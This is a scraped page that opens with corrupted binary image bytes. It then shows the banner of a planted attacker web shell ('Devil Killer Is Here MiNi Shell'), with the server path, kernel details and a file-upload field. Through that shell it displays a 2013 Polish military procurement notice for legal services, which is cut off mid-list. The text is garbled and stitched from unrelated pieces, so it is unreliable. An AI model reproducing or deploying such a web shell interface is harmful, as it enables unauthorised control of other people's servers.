JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130124/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130124/33460-N-2013.html

<p class="kh_header"><b>Warszawa: Świadczenie usług prawniczych oraz usług w zakresie zastępstwa procesowego dla potrzeb instytucji będących na zaopatrzeniu logistycznym JW2063.</b><br>
<b>Numer ogłoszenia: 33460 - 2013; data zamieszczenia: 24.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 2063 , ul. Banacha 2, 00-909 Warszawa, woj. mazowieckie, tel. 22 6824215, 6824375, 6824121, faks 22 6824108.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamowienia.ozdgw.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług prawniczych oraz usług w zakresie zastępstwa procesowego dla potrzeb instytucji będących na zaopatrzeniu logistycznym JW2063..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje świadczenie pomocy prawnej oraz zastępstwa procesowego na rzecz instytucji będących na zaopatrzeniu logistycznym Jednostki Wojskowej 2063, o których mowa w ust. 13, zwanymi w treści umowy USŁUGODAWCAMI, określonego według kodu  CPV - 79.11.10.00-5 usługi prawnicze.

2.	Formularz Cenowy- Oferta Wykonawcy stanowi załącznik  nr 2 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie wiedzy i doświadczenia Zamawiający wymaga załączenia:
a	wykazu wykonywanych usług co najmniej 2 usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy 
i doświadczenia tj.: świadczenie doradztwa prawnego, zastępstwa procesowego w zakresie bieżącej obsługi prawnej jednostek sektora finansów publicznych w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, na kwotę nie mniejszą niż cena brutto składanej oferty każda na formularzu określonym w Zał. nr 4 do SIWZ, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na potwierdzenie potencjału osobowego Zamawiający wymaga załączenia;
wykazu osób , które będą uczestniczyć w realizacji zamówienia, posiadających doświadczenie w zawodzie radcy prawnego lub adwokata wraz 
z informacjami na temat ich kwalifikacji zawodowych i uprawnień określonym w Zał. Nr 5 do SIWZ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - doświadczenie Wykonawcy - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zamowienia.jw2063.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wykonawca może zwrócić się pisemnie na adres Zamawiającego, tj. JW 2063, ul. Banacha 2, 00-909 Warszawa lub faxem na numer 22 6824 108 z prośbą o SIWZ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2013 godzina 08:45, miejsce: JEDNOSTKA WOJSKOWA 2063, ul. Banacha2 , 00-909 Warszawa, pok.117..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOM EMERYTA WOJSKOWEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	udzielanie porad i konsultacji prawnych dyrektorowi DEW i innym pracownikom DEW, 
2	sporządzanie opinii prawnych i wyjaśnień w zakresie stosowania prawa, związanych 
z pracą wykonaną w DEW; 
3	informowanie Dyrektora DEW o zmianach w obowiązującym stanie prawnym związanym z pracą wykonywaną w zakresie działalności DEW oraz o uchybieniach działalności DEW w zakresie przestrzegania przepisów prawnych związanych z pracą wykonywaną oraz skutkach tych uchybień,  
4	sprawowanie zastępstwa procesowego DEW, występowanie w charakterze pełnomocnika przed organami orzekającymi, opiniowanie pod względem prawnym spraw związanych z postępowaniem przed tymi organami, w tym również postępowaniem wyjaśniającym w sprawach szkód i wypadków oraz w sprawach dotyczących stosunków pracy, a także sprawowanie pomocy prawnej przy egzekucji wierzytelności DEW, 
5	opiniowanie pod względem prawnym: decyzji w sprawach indywidualnych wydawanych przez dyrektora DEW, decyzji o odmowie uznania zgłoszonych roszczeń, umorzenia lub odroczenia spłaty lub rozłożenia na raty należności, spisywania w straty nieściągalnych należności, strat powstałych w środkach trwałych, zawiadomienia organu powołanego do ścigania przestępstw o stwierdzeniu przestępstwa ściganego z urzędu, 
6	opracowywanie projektów dokumentów dotyczących udzielenia zamówienia publicznego ze środków pozostających w dyspozycji DEW,
7	przygotowywanie projektów umów i ugód w sprawach majątkowych, 
8	opiniowanie spraw pracowniczych oraz przygotowywanie odpowiednich propozycji ich rozwiązania albo odpowiednich pism procesowych,
9	uzgadnianie z pracownikiem sekcji finansowej sposobów egzekwowania wierzytelności DEW, w szczególności związanych z nieterminową płatnością 
za pobyt w DEW,
10	opracowywanie lub opiniowanie pod względem prawnym standardów pobytu 
w DEW,
11	wyjaśnianie sposobu załatwienia spraw indywidualnych mieszkańców DEW, 
w tym zwłaszcza dotyczących dziedziczenia, zapisów, darowizn, przenoszenia własności itp.,  
12	uczestniczenie w opiniowaniu projektów aktów normatywnych uzgadnianych 
z DEW oraz opracowywanie projektów wydawanych w DEW dokumentów 
o charakterze normatywnym, decyzji administracyjnych, postanowień i innych aktów z zakresu administracji publicznej dotyczących przyznania, stwierdzenia albo uznania uprawnienia lub obowiązku, wynikających z przepisów prawa, 
13	uczestniczenie w prowadzonych przez dyrektora DEW rokowaniach związanych 
z realizacją przez DEW zadań, w szczególności na szczeblu Departamentu Spraw Socjalnych MON oraz Jednostki Wojskowej Nr 2063, 
14	obsługa prawna - w siedzibie DEW, Warszawa ul. Pirenejska 5, jeden raz w tygodniu 
w wymiarze 2 godz., czas realizacji pomocy prawnej w godz., pomiędzy 13.30-15.30 konkretny dzień tygodnia świadczenia pomocy prawnej do odrębnego ustalenia; niezbędny jest stały dostęp telefoniczny do osoby świadczącej pomoc prawną oraz możliwość stałego porozumiewania się na odległość za pomocą faksów i e-maili; pożądana jest również dostępność osoby świadczącej pomoc prawną na żądanie 
w innych dniach tygodnia w czasie dzień i godziny uzgodnionym z dyrektorem DEW lub pracownikiem merytorycznym DEW. W ramach godzin świadczenia pomocy prawnej osoba wykonująca usługę obowiązana będzie również zapewnić dostęp dla mieszkańców DEW, w sprawach związanych z ich pobytem w placówce, 
a wymagających omówienia przy udziale prawnika. W czas świadczenia pomocy prawnej nie wliczany jest czas wykonywania zastępstwa procesowego, 
którego wymiar i faktyczne godziny uzależnione są od rodzaju prowadzonych spraw. Zastępstwo procesowe obejmuje obszar całego kraju oraz rodzajowo wszystkie sprawy cywilne, administracyjne, karne itp..  

WYMAGANIA
1	legitymowanie się wpisem na listę radców prawnych lub listę adwokatów prowadzonych przez właściwe okręgowe izby tych korporacji zawodowych.
2	udokumentowanie doświadczenia wykonywania obsługi prawnej na rzecz instytucji placówek o charakterze budżetowym, pomocy społecznej lub podobnych, 
co najmniej przez okres 3 lat; 
3	poświadczenie bezpieczeństwa upoważniającym go do dostępu do informacji niejawnych stanowiących tajemnicę państwową, co najmniej oznaczonych klauzulą poufne;  
4	kompleksowe prowadzenie sprawy przez jedną osobę osobiście, bez możliwości ich podzlecania innym osobom podmiotom zachowując dbałość o należyte wykorzystanie przewidzianych przez prawo środków dla ochrony uzasadnionych interesów DEW;  
5	znajomość prawa: pracy, cywilnego, gospodarczego, postępowania administracyjnego, postępowania cywilnego, finansów publicznych, gospodarki budżetowej jednostek sektora finansów publicznych, pomocy społecznej, ubezpieczeń społecznych i zdrowotnych, opieki zdrowotnej, gospodarki materiałowej w jednostkach sektora finansów publicznych, zaopatrzenia emerytalnego żołnierzy i rencistów wojskowych, spraw socjalnych i pomocy społecznej, a także wykazywać się kreatywnością, kulturą języka w mowie 
i w piśmie, umiejętnością nawiązywania kontaktu z osobami w wieku podeszłym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.05-.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. doświadczenia Wykonawcy - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wojskowe Centrum Geograficzne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	udzielanie aktualnych porad i konsultacji prawnych, a także opinii prawnych 
i wyjaśnień w zakresie stosowania prawa, związanych z wykonywaną pracą - zabezpieczeniem geograficznym SZ RP i komórek organizacyjnych MON;
2	informowanie Szefa WCG, Zastępcy Szefa WCG lub innej upoważnionej osoby 
z WCG o:
a)	zmianach w obowiązującym stanie prawnym związanym z wykonywaną pracą, 
w zakresie działalności WCG,
b	uchybieniach w działalności WCG w zakresie przestrzegania przepisów prawnych związanych z wykonywaną pracą oraz skutkach tych uchybień;
3	sprawowanie zastępstwa procesowego WCG lub Usługobiorcy działającego w jego interesie i na jego rzecz, występowanie w charakterze ich pełnomocnika przed organami orzekającymi, udzielanie w razie potrzeby dalszego pełnomocnictwa procesowego innemu radcy prawnemu lub adwokatowi, opiniowanie pod względem prawnym spraw związanych z postępowaniem przed tymi organami; 
4	sprawowanie nadzoru prawnego nad egzekucją należności WCG lub Usługobiorcy działającego w jego interesie i na jego rzecz; 
5	opiniowanie decyzji w sprawach indywidualnych, skomplikowanych pod względem prawnym, a w szczególności dotyczące: 
a	prowadzenia szkoleń dla pracowników WCG; 
b	zawierania ugody w sprawach majątkowych; 
c	odmowy uznania zgłoszonych roszczeń; 
d	umarzania, odraczania spłaty lub rozłożenia na raty należności; 
e	zawiadamiania organu powołanego do ścigania przestępstw o stwierdzeniu przestępstwa ściganego z urzędu; 
f	postępowania wyjaśniającego w sprawach szkód i wypadków; 
g	rozwiązywania z pracownikiem stosunku pracy bez wypowiedzenia;
6	uczestniczenie w opiniowaniu projektów aktów prawnych uzgadnianych z WCG 
lub Usługobiorcą działającym w jego interesie i na jego rzecz oraz 
w opracowywaniu projektów wydawanych przez nich aktów normatywnych i innych aktów z zakresu administracji publicznej dotyczących przyznania, stwierdzenia albo uznania uprawnienia lub obowiązku, wynikających z przepisów prawa, w tym aktów prawa zakładowego, a także kierownictwa wewnętrznego; 
7	uczestniczenie w miarę potrzeb i istniejących możliwości w prowadzonych przez WCG lub Usługobiorcę działającego w jego interesie i na jego rzecz rokowaniach związanych z wykonywaną pracą, w tym zwłaszcza mających na celu nawiązanie, zmianę lub rozwiązanie stosunku prawnego; 
8	wykonywanie czynności prawnych dotyczących prawa cywilnego, prawa administracyjnego, prawa geodezyjnego i kartograficznego, prawa pracy, a także zagadnień rachunkowości budżetowej, finansów publicznych, jak również przepisów pragmatycznych dotyczących służby wojskowej żołnierzy zlecanych przez osoby upoważnione z WCG; 
9	sprawy do załatwienia są przekazywane doraźnie, w miarę zachodzących w trakcie wykonywania pracy potrzeb, w siedzibie Usługobiorcy lub WCG, przez Szefa WCG, Zastępcę Szefa WCG albo przez inne upoważnione przez nich osoby; 
10	przy przekazywaniu spraw, wskazane wyżej osoby każdorazowo określają, w formie odpowiednich dekretacji na dokumentach lub w inny dogodny dla Stron sposób, 
w tym za pomocą wskazanych środków komunikacji elektronicznej, zakres podstawowych czynności oraz termin, w jakim mają być one wykonane przez Usługobiorcę, jak również ewentualne dodatkowe wymagania WCG; 

WYMAGANIA
1	dyżur - obsługa prawna świadczona będzie dwa razy w tygodniu tj. we wtorek, czwartek w godz. 7.30-15.30 w siedzibie WCG w Warszawie przy 
ul. Al. Jerozolimskie 97, w pozostałe dni możliwość konsultacji telefonicznej 
i komunikacji elektronicznej przez Internet z wyłączeniem dni ustawowo wolnych od pracy - adres e-mail WCG - wcg@wp.mil.pl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. doświadczenie Wykonawcy - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zespół Taktycznych Systemów Transmisji Danych i Navstar GPS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	udzielanie porad i konsultacji prawnych Szefowi ZTiN oraz na potrzeby innych pracowników ZTiN w ramach spraw zaistniałych w toku prowadzonej przez nich działalności służbowej;
2)	przekazywanie informacji o powszechnym stanie prawnym dotyczącym działalności ZTiN, uchybieniach prawnych w działalności ZTiN i sposobu ich naprawy
3)	opiniowanie i konsultacje prawne decyzji wydanych w sprawach wynikających 
z działalności ZTiN;
4)	wykonywanie zastępstwa procesowego przed sądami lub innymi organami orzekającymi; 

WYMAGANIA
dyżur - obsługa prawna będzie świadczona w siedzibie ZTiN 
w pomieszczeniu Szefa ZTiN jeden raz w tygodniu w wymiarze jednej godziny każda środa w godz. 10.00-11.00 w Warszawie przy 
ul. Radiowej 49..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. doświadczenie Wykonawcy - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szefostwo Geografii Wojskowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	stałe opiniowanie projektów umów, porozumień, wewnętrznych regulacji i aktów administracyjnych decyzji z pragragmatyki służbowej żołnierzy zawodowych 
w oparciu o przepisy prawne na każde zlecenie Szefa Geografii Wojskowej 
oraz interpretowanie tych opracowań;
2	przygotowywanie decyzji administracyjnych;
3	występowanie przed wszystkimi sądami powszechnymi i Sądem Najwyższym oraz organami egzekucyjnymi w ramach zastępstwa procesowego, sporządzania apelacji, skarg kasacyjnych i innych pism procesowych:
